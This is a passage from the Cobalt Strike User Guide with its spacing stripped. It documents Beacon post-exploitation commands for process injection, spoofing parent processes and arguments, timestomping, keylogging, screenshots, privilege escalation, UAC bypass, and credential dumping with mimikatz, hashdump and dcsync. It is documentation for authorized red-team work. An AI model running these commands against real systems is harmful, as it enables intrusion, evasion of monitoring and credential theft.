intomemory.ThePowerAppletdemonstratestheflexibilityyouhavetorecreateCobaltStrike’s
|
||
standardattacksinacompletelydifferentwayandstillusethemwithCobaltStrike’sworkflows.
|
||
TomakeCobaltStrikeuseyourAppletKitoverthebuilt-inone,loadtheapplet.cnascript
|
||
includedwiththeAppletKit.
|
||
The Resource Kit
|
||
TheResourceKitisCobaltStrike’smeanstochangetheHTA,PowerShell,Python,VBA,andVBS
|
||
scripttemplatesCobaltStrikeusesinitsworkflows.TheResourceKitispartoftheArsenalKit,
|
||
whichcontainsacollectionofkitsandisavailabletolicensedusersintheCobaltStrikearsenal.
|
||
GotoHelp ->Arsenal todownloadtheArsenalKit.
|
||
TheREADME.mdsuppliedwiththeResourceKitdocumentstheincludedscriptsandwhich
|
||
featuresusethem.Toevadeaproduct,considerchangingstringsorbehaviorsinthesescripts.
|
||
TomakeCobaltStrikeuseyourscripttemplatesoverthebuilt-inscripttemplates,loadeither
|
||
thedist/arsenal_kit.cnaordist/resource/resources.cnascript.SeetheArsenalKitREADME.md
|
||
fileformoreinformation.
|
||
The Sleep Mask Kit
|
||
TheSleepMaskKitisthesourcecodeforthesleepmaskfunctionthatisexecutedtoobfuscate
|
||
Beacon,inmemory,priortosleeping.Thisobfuscationtechniquemaybeusedtoidentify
|
||
Beacon.Todefeatthisdetection,CobaltStrikeprovidsanaggressorscriptthatallowstheuser
|
||
tomodifyhowthesleepmaskfunctionlooksinmemory.Withthe4.5releasealistofheap
|
||
recordstomaskandunmaskisincluded.GotoHelp -> ArsenaltodownloadtheArsenalKit
|
||
whichincludestheSleepMaskKit.Yourlicensekeyisrequired.
|
||
FormoreinformationontheSleepMaskKitseethearsenal-kit/README.mdandarsenal-
|
||
kit/kits/sleepmask/README.mdfiles.
|
||
CobaltStrikeUserGuide www.fortra.com page:92
|
||
|
||
PostExploitation/BeaconCovertC2Payload
|
||
Post Exploitation
|
||
Beacon Covert C2 Payload
|
||
BeaconisCobaltStrikespayloadtomodeladvancedattackers.UseBeacontoegressanetwork
|
||
overHTTP,HTTPS,orDNS.Youmayalsolimitwhichhostsegressanetworkbycontrolling
|
||
peer-to-peerBeaconsoverWindowsnamedpipes.
|
||
Beaconisflexibleandsupportsasynchronousandinteractivecommunication.Asynchronous
|
||
communicationislowandslow.Beaconwillphonehome,downloaditstasks,andgotosleep.
|
||
Interactivecommunicationhappensinreal-time.
|
||
Beacon'snetworkindicatorsaremalleable.RedefineBeacon'scommunicationwithCobalt
|
||
Strike'smalleableC2language.ThisallowsyoutocloakBeaconactivitytolooklikeother
|
||
malwareorblend-inaslegitimatetraffic.
|
||
The Beacon Console
|
||
Right-clickonaBeaconsessionandselectinteracttoopenthatBeacon’sconsole.Theconsole
|
||
isthemainuserinterfaceforyourBeaconsession.TheBeaconconsoleallowsyoutoseewhich
|
||
taskswereissuedtoaBeaconandtoseewhenitdownloadsthem.TheBeaconconsoleisalso
|
||
wherecommandoutputandotherinformationwillappear.
|
||
figure53-CobaltStrikeBeaconConsole
|
||
InbetweentheBeaconconsole’sinputandoutputisastatusbar.Thisstatusbarcontains
|
||
informationaboutthecurrentsession.Initsdefaultconfiguration,thestatusbarshowsthe
|
||
target’sNetBIOSname,theusernameandPIDofthecurrentsession,andtheBeacon’slast
|
||
check-intime.
|
||
CobaltStrikeUserGuide www.fortra.com page:93
|
||
|
||
PostExploitation/TheBeaconMenu
|
||
Eachcommandthat’sissuedtoaBeacon,whetherthroughtheGUIortheconsole,willshowup
|
||
inthiswindow.Ifateammateissuesacommand,CobaltStrikewillpre-fixthecommandwith
|
||
theirhandle.
|
||
YouwilllikelyspendmostofyourtimewithCobaltStrikeintheBeaconconsole.It’sworthyour
|
||
timetobecomefamiliarwithitscommands.Typehelp intheBeaconconsoletoseeavailable
|
||
commands.Typehelp followedbyacommandnametogetdetailedhelp.
|
||
The Beacon Menu
|
||
Right-clickonaBeaconorinsideofaBeacon’sconsoletoaccesstheBeaconmenu.Thisisthe
|
||
samemenuusedtoopentheBeaconconsole.Thefollowingitemsareavailable:
|
||
TheAccessmenucontainsoptionstomanipulatetrustmaterialandelevateyouraccess.
|
||
TheExploremenuconsistsofoptionstoextractinformationandinteractwiththetarget’s
|
||
system.
|
||
ThePivotingmenuiswhereyoucansetuptoolstotunneltrafficthroughaBeacon.
|
||
TheSessionmenuiswhereyoumanagethecurrentBeaconsession.
|
||
figure54-CobaltStrikeBeaconMenu
|
||
SomeofCobaltStrike’svisualizations(thepivotgraphandsessionstable)letyouselectmultiple
|
||
Beaconsatonetime.Mostactionsthathappenthroughthismenuwillapplytoallselected
|
||
Beaconsessions.
|
||
Asynchronous and Interactive Operations
|
||
CobaltStrikeUserGuide www.fortra.com page:94
|
||
|
||
PostExploitation/RunningCommands
|
||
BeawarethatBeaconisanasynchronouspayload.Commandsdonotexecuterightaway.Each
|
||
commandgoesintoaqueue.WhentheBeaconchecksin(connectstoyou),itwilldownload
|
||
thesecommandsandexecutethemonebyone.Atthistime,Beaconwillalsoreportanyoutput
|
||
ithasforyou.Ifyoumakeamistake,usetheclear commandtoclearthecommandqueuefor
|
||
thecurrentBeacon.
|
||
Bydefault,Beaconscheckineverysixtyseconds.YoumaychangethiswithBeacon’ssleep
|
||
command.UsesleepfollowedbyatimeinsecondstospecifyhowoftenBeaconshouldcheck
|
||
in.Youmayalsospecifyasecondnumberbetween0and99.Thisnumberisajitterfactor.
|
||
Beaconwillvaryeachofitscheckintimesbytherandompercentageyouspecifyasajitter
|
||
factor.Forexample,sleep 300 20,willforceBeacontosleepfor300secondswitha20%jitter
|
||
percentage.Thismeans,Beaconwillsleepforarandomvaluebetween240sto300saftereach
|
||
check-in.
|
||
TomakeaBeaconcheckinmultipletimeseachsecond,trysleep 0.Thisisinteractivemode.In
|
||
thismodecommandswillexecuterightaway.YoumustmakeyourBeaconinteractivebefore
|
||
youtunneltrafficthroughit.AfewBeaconcommands(e.g.,browserpivot,desktop,etc.)will
|
||
automaticallyputBeaconintointeractivemodeatthenextcheckin.
|
||
Running Commands
|
||
Beacon’sshell commandwilltaskaBeacontoexecuteacommandviacmd.exeonthe
|
||
compromisedhost.Whenthecommandcompletes,Beaconwillpresenttheoutputtoyou.
|
||
Usetherun commandtoexecuteacommandwithoutcmd.exe.Theruncommandwillpost
|
||
outputtoyou.Theexecute commandrunsaprograminthebackgroundanddoesnotcapture
|
||
output.
|
||
Usethepowershell commandtoexecuteacommandwithPowerShellonthecompromised
|
||
host.Usethepowerpick commandtoexecutePowerShellcmdletswithoutpowershell.exe.
|
||
ThiscommandreliesontheUnmanagedPowerShelltechniquedevelopedbyLeeChristensen.
|
||
Thepowershellandpowerpickcommandswilluseyourcurrenttoken.
|
||
Thepsinject commandwillinjectUnmanagedPowerShellintoaspecificprocessandrunyour
|
||
cmdletfromthatlocation.
|
||
Thepowershell-import commandwillimportaPowerShellscriptintoBeacon.Futureusesof
|
||
thepowershell,powerpick,andpsinjectcommandswillhavecmdletsfromtheimportedscript
|
||
availabletothem.BeaconwillonlyholdonePowerShellscriptatatime.Importanemptyfileto
|
||
cleartheimportedscriptfromBeacon.
|
||
Theexecute-assembly commandwillrunalocal.NETexecutableasaBeaconpost-
|
||
exploitationjob.YoumaypassargumentstothisassemblyasifitwererunfromaWindows
|
||
command-lineinterface.Thiscommandwillalsoinherityourcurrenttoken.
|
||
CobaltStrikeUserGuide www.fortra.com page:95
|
||
|
||
PostExploitation/SessionPassing
|
||
IfyouwantBeacontoexecutecommandsfromaspecificdirectory,usethecd commandinthe
|
||
BeaconconsoletoswitchtheworkingdirectoryoftheBeacon’sprocess.Thepwd command
|
||
willtellyouwhichdirectoryyou’recurrentlyworkingfrom.
|
||
Thesetenv commandwillsetanenvironmentvariable.
|
||
BeaconcanexecuteBeaconObjectFileswithoutcreatinganewprocess.BeaconObjectFiles
|
||
arecompiledCprograms,writtentoaspecificconvention,thatrunwithinaBeaconsession.
|
||
Useinline-execute [args] toexecuteaBeaconObjectFilewiththespecifiedarguments.See
|
||
Beacon Object Files on page 171formoreinformation.
|
||
Session Passing
|
||
CobaltStrike’sBeaconstartedoutasastablelifelinetokeepaccesstoacompromisedhost.
|
||
Fromdayone,Beacon’sprimarypurposewastopassaccessestootherCobaltStrikelisteners.
|
||
Usethespawn commandtospawnasessionforalistener.Thespawncommandacceptsan
|
||
architecture(e.g.,x86,x64)andalistenerasitsarguments.
|
||
Bydefault,thespawn commandwillspawnasessioninrundll32.exe.Analertadministrator
|
||
mayfinditstrangethatrundll32.exeisperiodicallymakingconnectionstotheinternet.Finda
|
||
betterprogram(e.g.,InternetExplorer)andusethespawnto commandtostatewhichprogram
|
||
Beaconshouldspawnforitssessions.
|
||
Thespawnto commandrequiresyoutospecifyanarchitecture(x86orx64)andafullpathtoa
|
||
programtospawn,asneeded.Typespawnto byitselfandpressentertoinstructBeacontogo
|
||
backtoitsdefaultbehavior.
|
||
Typeinject followedbyaprocessidandalistenernametoinjectasessionintoaspecific
|
||
process.Useps togetalistofprocessesonthecurrentsystem.Useinject [pid] x64 toinjecta
|
||
64-bitBeaconintoanx64process.
|
||
Thespawnandinjectcommandsbothinjectapayloadstageintomemory.Ifthepayloadstage
|
||
isanHTTP,HTTPS,orDNSBeaconanditcan’treachyou—youwillnotseeasession.Ifthe
|
||
payloadstageisabindTCPorSMBBeacon,thesecommandswillautomaticallytrytolinkto
|
||
andassumecontrolofthesepayloads.
|
||
Usedllinject [pid] toinjectaReflectiveDLLintoaprocess.
|
||
Usetheshinject [pid] [architecture] [/path/to/file.bin] commandtoinjectshellcode,froma
|
||
localfile,intoaprocessontarget.Useshspawn [architecture] [/path/to/file.bin] tospawnthe
|
||
“spawnto”processandinjectthespecifiedshellcodefileintothatprocess.
|
||
Usedllload [pid] [c:\path\to\file.dll] toloadanon-diskDLLinanotherprocess.
|
||
CobaltStrikeUserGuide www.fortra.com page:96
|
||
|
||
PostExploitation/AlternateParentProcesses
|
||
Alternate Parent Processes
|
||
Useppid [pid] toassignanalternateparentprocessforprogramsrunbyyourBeaconsession.
|
||
Thisisameanstomakeyouractivityblendinwithnormalactionsonthetarget.Thecurrent
|
||
Beaconsessionmusthaverightstothealternateparentandit’sbestifthealternateparent
|
||
processexistsinthesamedesktopsessionasyourBeacon.Typeppid,withnoarguments,to
|
||
haveBeaconlaunchprocesseswithnospoofedparent.
|
||
Therunu commandwillexecuteacommandwithanotherprocessastheparent.This
|
||
commandwillrunwiththerightsanddesktopsessionofitsalternateparentprocess.The
|
||
currentBeaconsessionmusthavefullrightstothealternateparent.Thespawnu commandwill
|
||
spawnatemporaryprocess,asachildofaspecifiedprocess,andinjectaBeaconpayload
|
||
stageintoit.
|
||
Thespawntovaluecontrolswhichprogramisusedasatemporaryprocess.
|
||
Spoof Process Arguments
|
||
EachBeaconhasaninternallistofcommandsitshouldspoofargumentsfor.WhenBeacon
|
||
runsacommandthatmatchesalist,Beacon:
|
||
1. Startsthematchedprocessinasuspendedstate(withthefakearguments)
|
||
2. Updatestheprocessmemorywiththerealarguments
|
||
3. Resumestheprocess
|
||
Theeffectisthathostinstrumentationrecordingaprocesslaunchwillseethefakearguments.
|
||
Thishelpsmaskyourrealactivity.
|
||
Useargue [command] [fake arguments] toaddacommandtothisinternallist.The
|
||
[command]portionmaycontainanenvironmentvariable.Useargue [command] toremovea
|
||
commandfromthisinternallist.argue,byitself,liststhecommandsinthisinternallist.
|
||
Theprocessmatchlogicisexact.IfBeacontriestolaunch“net.exe”,itwillnotmatchnet,
|
||
NET.EXE,orc:\windows\system32\net.exefromitsinternallist.Itwillonlymatchnet.exe.
|
||
x86Beaconcanonlyspoofargumentsinx86childprocesses.Likewise,x64Beaconcanonly
|
||
spoofargumentsinx64childprocesses.
|
||
Therealargumentsarewrittentothememoryspacethatholdsthefakearguments.Ifthereal
|
||
argumentsarelongerthanthefakearguments,thecommandlaunchwillfail.
|
||
Blocking DLLs in Child Processes
|
||
CobaltStrikeUserGuide www.fortra.com page:97
|
||
|
||
PostExploitation/UploadandDownloadFiles
|
||
Useblockdlls start toaskBeacontolaunchchildprocesseswithabinarysignaturepolicythat
|
||
blocksnon-MicrosoftDLLsfromtheprocessspace.Useblockdlls stop todisablethisbehavior.
|
||
ThisfeaturerequiresWindows10.
|
||
Upload and Download Files
|
||
download-Thiscommanddownloadstherequestedfile.Youdonotneedtoprovidequotes
|
||
aroundafilenamewithspacesinit.Beaconisbuiltforlowandslowexfiltrationofdata.
|
||
Duringeachcheck-in,Beaconwilldownloadafixedchunkofeachfileitstaskedtoget.
|
||
ThesizeofthischunkdependsonBeacon’scurrentdatachannel.TheHTTPandHTTPS
|
||
channelspulldatain512KBchunks.
|
||
downloads-UsetoseealistoffiledownloadsinprogressforthecurrentBeacon.
|
||
cancel-Issuethiscommand,followedbyafilename,tocanceladownloadthat’sinprogress.
|
||
Youmayusewildcardswithyourcancelcommandtocancelmultiplefiledownloadsat
|
||
once.
|
||
upload-Thiscommanduploadsafiletothehost.
|
||
timestomp-Whenyouuploadafile,youwillsometimeswanttoupdateitstimestampsto
|
||
makeitblendinwithotherfilesinthesamefolder.Thiscommandwilldothis.The
|
||
timestompcommandmatchestheModified,Accessed,andCreatedtimesofonefileto
|
||
anotherfile.
|
||
GotoView->DownloadsinCobaltStriketoseethefilesthatyourteamhasdownloadedsofar.
|
||
Onlycompleteddownloadsshowupinthistab.
|
||
Downloadedfilesarestoredontheteamserver.Tobringfilesbacktoyoursystem,highlight
|
||
themhere,andpressSync Files.CobaltStrikethendownloadstheselectedfilestoafolderof
|
||
yourchoosingonyoursystem.
|
||
File Browser
|
||
Beacon’sFileBrowserisanopportunitytoexplorethefilesonacompromisedsystem.Goto
|
||
[Beacon] ->Explore ->File Browser toopenit.
|
||
Youcanalsoissuethecommand,file_browser,toopenthefilebrowsertabstartinginthe
|
||
currentdirectory.
|
||
ThefilebrowserwillrequestalistingforthecurrentworkingdirectoryofBeacon.Whenthis
|
||
resultarrives,thefilebrowserwillpopulate.
|
||
CobaltStrikeUserGuide www.fortra.com page:98
|
||
|
||
PostExploitation/TheWindowsRegistry
|
||
Theleft-handsideofthefilebrowserisatreewhichorganizestheknowndrivesandfoldersinto
|
||
oneview.Theright-handsideofthefilebrowsershowsthecontentsofthecurrentfolder.
|
||
figure55-FileBrowser
|
||
Eachfilebrowsercachesthefolderlistingsitreceives.Acoloredfolderindicatesthefolder’s
|
||
contentsareinthisfilebrowser’scache.Youmaynavigatetocachedfolderswithoutgenerating
|
||
anewfilelistingrequest.PressRefresh toaskBeacontoupdatethecontentsofthecurrent
|
||
folder.
|
||
Adark-greyfoldermeansthefolder’scontentsarenotinthisfilebrowser’scache.Clickona
|
||
folderinthetreetohaveBeacongenerateatasktolistthecontentsofthisfolder(andupdateits
|
||
cache).Double-clickonadark-greyfolderintheright-handsidecurrentfolderviewtodothe
|
||
same.
|
||
Togoupafolder,pressthefolderbuttonnexttothefilepathabovetheright-handsidefolder
|
||
detailsview.Iftheparentfolderisinthisfilebrowser’scache,youwillseetheresults
|
||
immediately.Iftheparentfolderisnotinthefilebrowser’scache,thebrowserwillgeneratea
|
||
tasktolistthecontentsoftheparentfolder.
|
||
Right-clickafiletodownloadordeleteit.
|
||
Toseewhichdrivesareavailable,pressList Drives.
|
||
File System Commands
|
||
YoumayprefertobrowseandmanipulatethefilesystemfromtheBeaconconsole.
|
||
Usethels commandtolistfilesinthecurrentdirectory.Usemkdir tomakeadirectory.rm will
|
||
removeafileorfolder.cp copiesafiletoadestination.mv movesafile.
|
||
The Windows Registry
|
||
CobaltStrikeUserGuide www.fortra.com page:99
|
||
|
||
PostExploitation/KeystrokesandScreenshots
|
||
Usereg_query [x86|x64] [HIVE\path\to\key] toqueryaspecifickeyintheregistry.This
|
||
commandwillprintthevalueswithinthatkeyandalistofanysubkeys.Thex86/x64optionis
|
||
requiredandforcesBeacontousetheWOW64(x86)ornativeviewoftheregistry.reg_query
|
||
[x86|x64] [HIVE\path\to\key] [value] willqueryaspecificvaluewithinaregistrykey.
|
||
Keystrokes and Screenshots
|
||
Beacon’stoolstologkeystrokesandtakescreenshotsaredesignedtoinjectintoanother
|
||
processandreporttheirresultstoyourBeacon.
|
||
Tostartthekeystrokelogger,usekeylogger pid x86 toinjectintoanx86process.Use
|
||
keylogger pid x64 toinjectintoanx64process.Usekeylogger byitselftoinjectthekeystroke
|
||
loggerintoatemporaryprocess.Thekeystrokeloggerwillmonitorkeystrokesfromtheinjected
|
||
processandreportthemtoBeaconuntiltheprocessterminatesoryoukillthekeystrokelogger
|
||
post-exploitationjob.
|
||
Beawarethatmultiplekeystrokeloggersmayconflictwitheachother.Useonlyonekeystroke
|
||
loggerperdesktopsession.
|
||
Totakeascreenshot,usescreenshot pid x86 toinjectthescreenshottoolintoanx86process.
|
||
Usescreenshot pid x64 toinjectintoanx64process.Thisvariantofthescreenshotcommand
|
||
willtakeonescreenshotandexit.screenshot,byitself,willinjectthescreenshottoolintoa
|
||
temporaryprocess.
|
||
Thescreenwatch command(withoptionstouseatemporaryprocessorinjectintoanexplicit
|
||
process)willcontinuouslytakescreenshotsuntilyoustopthescreenwatchpost-exploitation
|
||
job.
|
||
Usetheprintscreen command(alsowithtemporaryprocessandinjectoptions)totakea
|
||
screenshotbyadifferentmethod.ThiscommandusesaPrintScrkeypresstoplacethe
|
||
screenshotontotheuser'sclipboard.Thisfeaturerecoversthescreenshotfromtheclipboard
|
||
andreportsitbacktoyou.
|
||
WhenBeaconreceivesnewscreenshotsorkeystrokes,itwillpostamessagetotheBeacon
|
||
console.ThescreenshotandkeystrokeinformationisnotavailablethroughtheBeaconconsole
|
||
though.GotoView ->Keystrokes toseeloggedkeystrokesacrossallofyourBeaconsessions.
|
||
GotoView ->Screenshots tobrowsethroughscreenshotsfromallofyourBeaconsessions.
|
||
Bothofthesedialogsupdateasnewinformationcomesin.Thesedialogsmakeiteasyforone
|
||
operatortomonitorkeystrokesandscreenshotsonallofyourBeaconsessions.
|
||
Controlling Beacon Jobs
|
||
CobaltStrikeUserGuide www.fortra.com page:100
|
||
|
||
PostExploitation/TheProcessBrowser
|
||
SeveralBeaconfeaturesrunasjobsinanotherprocess(e.g.,thekeystrokeloggerand
|
||
screenshottool).Thesejobsruninthebackgroundandreporttheiroutputwhenit’savailable.
|
||
Usethejobs commandtoseewhichjobsarerunninginyourBeacon.Usejobkill [job number]
|
||
tokillajob.
|
||
The Process Browser
|
||
TheProcessBrowserdoestheobvious;ittasksaBeacontoshowalistofprocessesandshows
|
||
thisinformationtoyou.Goto[beacon] -> Explore -> Show ProcessestoopentheProcess
|
||
Browser.
|
||
Youcanalsoissuethecommand,process_browser,toopentheprocessbrowsertabstarting
|
||
inthecurrentdirectory.
|
||
figure56-ProcessBrowser
|
||
Theleft-handsideshowstheprocessesorganizedintoatree.Thecurrentprocessforyour
|
||
Beaconishighlightedyellow.
|
||
Theright-handsideshowstheprocessdetails.TheProcessBrowserisalsoaconvenientplace
|
||
toimpersonateatokenfromanotherprocess,deploythescreenshottool,ordeploythe
|
||
keystrokelogger.
|
||
Highlightoneormoreprocessesandpresstheappropriatebuttonatthebottomofthetab.
|
||
IfyouhighlightmultipleBeaconsandtaskthemtoshowprocesses,CobaltStrikewillshowa
|
||
ProcessBrowserthatalsostateswhichhosttheprocesscomesfrom.Thisvariantofthe
|
||
ProcessBrowserisaconvenientwaytodeployBeacon’spost-exploitationtoolstomultiple
|
||
systemsatonce.
|
||
CobaltStrikeUserGuide www.fortra.com page:101
|
||
|
||
PostExploitation/DesktopControl
|
||
Simplysortbyprocessname,highlighttheinterestingprocessesonyourtargetsystems,and
|
||
presstheScreenshotorLog Keystrokesbuttontodeploythesetoolstoallhighlighted
|
||
systems.
|
||
Desktop Control
|
||
Tointeractwithadesktoponatargethost,goto[beacon] -> Explore -> Desktop (VNC).This
|
||
willstageaVNCserverintothememoryofthecurrentprocessandtunneltheconnection
|
||
throughBeacon.
|
||
WhentheVNCserverisready,CobaltStrikewillopenatablabeledDesktop HOST@PID.
|
||
YoumayalsouseBeacon’sdesktop commandtoinjectaVNCserverintoaspecificprocess.
|
||
Usedesktop pid architecture low|high.Thelastparameterlet’syouspecifyaqualityforthe
|
||
VNCsession.
|
||
figure57-CobaltStrikeDesktopViewer
|
||
Thebottomofthedesktoptabhasseveralbuttons.Theseare:
|
||
Refreshthescreen
|
||
Viewonly
|
||
DecreaseZoom
|
||
IncreaseZoom
|
||
CobaltStrikeUserGuide www.fortra.com page:102
|
||
|
||
PostExploitation/PrivilegeEscalation
|
||
Zoomto100%
|
||
AdjustZoomtoFit
|
||
Tab
|
||
SendCtrl+Escape
|
||
LocktheCtrlkey
|
||
LocktheAltkey
|
||
Ifyoucan’ttypeinaDesktoptab,checkthestateoftheCtrl andAlt buttons.Wheneitherbutton
|
||
ispressed,allofyourkeystrokesaresentwiththeCtrlorAltmodifier.PresstheCtrl orAlt
|
||
buttontoturnoffthisbehavior.MakesureView only isn’tpressedeither.Topreventyoufrom
|
||
accidentallymovingthemouse, View only ispressedbydefault.
|
||
Privilege Escalation
|
||
Somepost-exploitationcommandsrequiresystemadministrator-levelrights.Beaconincludes
|
||
severaloptionstohelpyouelevateyouraccessincludingthefollowing:
|
||
NOTE:
|
||
Typehelp intheBeaconconsoletoseeavailablecommands.Typehelp followedbya
|
||
commandnametoseedetailedhelp.
|
||
Elevate with an Exploit
|
||
elevate-ThiscommandlistsprivilegeescalationexploitsregisteredwithCobaltStrike.
|
||
elevate [exploit] [listener]-Thiscommandattemptstoelevatewithaspecificexploit.
|
||
CobaltStrikeUserGuide www.fortra.com page:103
|
||
|
||
PostExploitation/PrivilegeEscalation
|
||
Youmayalsolaunchoneoftheseexploitsthrough[beacon] ->Access ->Elevate.
|
||
Choosealistener,selectanexploit,andpressLaunchtoruntheexploit.Thisdialogisa
|
||
front-endforBeacon'selevatecommand.
|
||
figure58-Elevate
|
||
YoumayaddprivilegeescalationexploitstoCobaltStrikethroughtheElevateKit.The
|
||
ElevateKitisanAggressorScriptthatintegratesseveralopensourceprivilegeescalation
|
||
exploitsintoCobaltStrike.https://github.com/rsmudge/ElevateKit.
|
||
runasadmin-Thiscommandbyitself,listscommandelevatorexploitsregisteredwithCobalt
|
||
Strike.
|
||
runasadmin [exploit] [command + args]-Thiscommandattemptstorunthespecified
|
||
commandinanelevatedcontext.
|
||
CobaltStrikeseparatescommandelevatorexploitsandsession-yieldingexploitsbecausesome
|
||
attacksareanaturalopportunitytospawnasession.Otherattacksyielda“runthiscommand”
|
||
primitive.Spawningasessionfroma“runthiscommand”primitiveputsalotofweaponization
|
||
decisions(notalwaysfavorable)inthehandsofyourtooldeveloper.Withrunasadmin,it’syour
|
||
choicetodropanexecutabletodiskandrunit,torunaPowerShellone-liner,ortoweakenthe
|
||
targetinsomeway.
|
||
Ifyou’dliketouseaPowerShellone-linertospawnasession,goto[beacon] ->Access ->One-
|
||
liner.
|
||
CobaltStrikeUserGuide www.fortra.com page:104
|
||
|
||
PostExploitation/PrivilegeEscalation
|
||
figure59-PowerShellOne-liner
|
||
Thisdialogwillsetupalocalhost-onlywebserverwithinyourBeaconsessiontohostapayload
|
||
stageandreturnaPowerShellcommandtodownloadandrunthispayloadstage.
|
||
Thiswebserverisone-useonly.Onceit’sconnectedtoonce,itwillcleanitselfupandstop
|
||
servingyourpayload.
|
||
IfyourunaTCPorSMBBeaconwiththistool,youwillneedtouseconnectorlinktoassume
|
||
controlofthepayloadmanually.Also,beawarethatifyoutrytouseanx64payload—thiswillfail
|
||
ifthex86PowerShellisinyour$PATH.
|
||
CobaltStrikedoesnothavemanybuilt-inelevateoptions.Exploitdevelopmentisnotafocusof
|
||
theworkatFortra.ItiseasytointegrateprivilegeescalationexploitsviaCobaltStrike’s
|
||
AggressorScriptprogramminglanguagethough.Toseewhatthislookslike,downloadthe
|
||
ElevateKit(https://github.com/cobalt-strike/ElevateKit).TheElevateKitisanAggressorScript
|
||
thatintegratesseveralopensourceprivilegeescalationexploitsintoCobaltStrike.
|
||
Elevate with Known Credentials
|
||
runas [DOMAIN\user] [password] [command]-Thisrunsacommandasanotheruserusing
|
||
theircredentials.Therunascommandwillnotreturnanyoutput.Youmayuserunasfrom
|
||
anon-privilegedcontextthough.
|
||
spawnas [DOMAIN\user] [password] [listener]-Thiscommandspawnsasessionasanother
|
||
userusingtheircredentials.Thiscommandspawnsatemporaryprocessandinjectsyour
|
||
payloadstageintoit.
|
||
Youmayalsogoto[beacon] ->Access ->Spawn As torunthiscommandaswell.
|
||
Withbothofthesecommands,beawarethatcredentialsforanon-SID500accountwillspawn
|
||
apayloadinamediumintegritycontext.YouwillneedtouseBypassUACtoelevatetoahigh
|
||
CobaltStrikeUserGuide www.fortra.com page:105
|
||
|
||
PostExploitation/PrivilegeEscalation
|
||
integritycontext.Also,beaware,thatyoushouldrunthesecommandsfromaworkingfolder
|
||
thatthespecifiedaccountcanread.
|
||
Get SYSTEM
|
||
getsystem-ThiscommandimpersonatesatokenfortheSYSTEMaccount.Thislevelof
|
||
accessmayallowyoutoperformprivilegedactionsthatarenotpossibleasan
|
||
Administratoruser.
|
||
AnotherwaytogetSYSTEMistocreateaservicethatrunsapayload.Theelevate svc-exe
|
||
[listener] commanddoesthis.Itwilldropanexecutablethatrunsapayload,createaserviceto
|
||
runit,assumecontrolofthepayload,andcleanuptheserviceandexecutable.
|
||
UAC Bypass
|
||
MicrosoftintroducedUserAccountControl(UAC)inWindowsVistaandrefineditinWindows7.
|
||
UACworksalotlikesudoinUNIX.Day-to-dayauserworkswithnormalprivileges.Whenthe
|
||
userneedstoperformaprivilegedaction—thesystemasksiftheywouldliketoelevatetheir
|
||
rights.
|
||
CobaltStrikeshipswithafewUACbypassattacks.Theseattackswillnotworkifthecurrent
|
||
userisnotanAdministrator.TocheckifthecurrentuserisintheAdministratorsgroup,userun
|
||
whoami /groups.
|
||
elevate uac-token-duplication [listener]-Thiscommandspawnsatemporaryprocesswith
|
||
elevatedrightsandinjectapayloadstageintoit.ThisattackusesaUAC-loopholethat
|
||
allowsanon-elevatedprocesstolaunchanarbitraryprocesswithatokenstolenfroman
|
||
elevatedprocess.Thisloopholerequirestheattacktoremoveseveralrightsassignedto
|
||
theelevatedtoken.Theabilitiesofyournewsessionwillreflecttheserestrictedrights.If
|
||
AlwaysNotifyisatitshighestsetting,thisattackrequiresthatanelevatedprocessis
|
||
alreadyrunninginthecurrentdesktopsession(asthesameuser).Thisattackworkson
|
||
Windows7andWindows10priortotheNovember2018update.
|
||
runasadmin uac-token-duplication [command]-Thisisthesameattackdescribedabove,but
|
||
thisvariantrunsacommandofyourchoosinginanelevatedcontext.
|
||
runasadmin uac-cmstplua [command]-ThiscommandattemptatobypassUACandruna
|
||
commandinanelevatedcontext.ThisattackreliesonaCOMobjectthatautomatically
|
||
elevatesfromcertainprocesscontexts(Microsoftsigned,livesinc:\windows\*).
|
||
Privileges
|
||
getprivs-Thiscommandenablestheprivilegesassignedtoyourcurrentaccesstoken.
|
||
CobaltStrikeUserGuide www.fortra.com page:106
|
||
|
||
PostExploitation/Mimikatz
|
||
Mimikatz
|
||
Beaconintegratesmimikatz.Usemimikatz [pid] [arch] [module::command] <args>toinject
|
||
intothespecifiedprocesstorunamimikatzcommand.Usemimikatz(without[pid]and[arch]
|
||
arguments)tospawnatemporaryprocesstorunamimikatzcommand.
|
||
SomemimikatzcommandsmustrunasSYSTEMtowork.Prefixacommandwithan
|
||
exclamtion( !)toforcemimikatztoelevatetoSYSTEMbeforeitrunsyourcommand.For
|
||
example,mimikatz!lsa::cache willrecoversaltedpasswordhashescachedbythesystem.Use
|
||
mimikatz [pid] [arch] [!module::command] <args>ormimikatz [!module::command] <args>
|
||
(without[pid]and[arch]arguments).
|
||
IfyouneedtorunamimikatzcommandwithBeacon’scurrentaccesstoken,youcanprefixa
|
||
commandwitha@toforcemimikatztoimpersonateBeacon’scurrentaccesstoken.For
|
||
example,mimikatz @lsadump::dcsync willrunthedcsynccommandinmimikatzwith
|
||
Beacon’scurrentaccesstoken.Usemimikatz [pid] [arch] [@module::command] <args>or
|
||
mimikatz [@module::command] <args>(without[pid]and[arch]arguments).
|
||
Ifyouwanttorunmultiplemimikatzcommandsinasinglecommand,usethesemicolon( ;)
|
||
charactertoseparatemultiplemimikatzcommands.Themaximumlengthofthecommandsis
|
||
511characters.Forexample,mimikatz crypto::capi ; crypto::certificates
|
||
/systemstore:local_machine /store:my /export
|
||
Credential and Hash Harvesting
|
||
Todumphashes,goto[beacon] ->Access ->Dump Hashes.Youcanalsousethehashdump
|
||
[pid] [x86|x64]commandfromtheBeaconconsoletoinjectthehashdumptoolintothe
|
||
specifiedprocess.Usehashdump(without[pid]and[arch]arguments)tospawnatemporary
|
||
processandinjectthehashdumptoolintoit.Thesecommandswillspawnajobthatinjectsinto
|
||
LSASSanddumpsthepasswordhashesforlocalusersonthecurrentsystem.Thiscommand
|
||
requiresadministratorprivileges.Ifinjectingintoapidthatprocessrequiresadministrator
|
||
privileges.
|
||
Uselogonpasswords [pid] [arch]toinjectintothespecifiedprocesstodumpplaintext
|
||
credentialsandNTLMhashes.Uselogonpasswords(without[pid]and[arch]arguments)to
|
||
spawnatemporaryprocesstodumpplaintextcredentialsandNTLMhashes.Thiscommand
|
||
usesmimikatzandrequiresadministratorprivileges.
|
||
Usedcsync [pid] [arch] [DOMAIN.fqdn] <DOMAIN\user>toinjectintothespecifiedprocessto
|
||
extracttheNTLMpasswordhashes.Usedcsync [DOMAIN.fqdn] <DOMAIN\user>tospawna
|
||
temporaryprocesstoextracttheNTLMpasswordhashes.Thiscommandusesmimikatzto
|
||
extracttheNTLMpasswordhashfordomainusersfromthedomaincontroller.Specifyauser
|
||
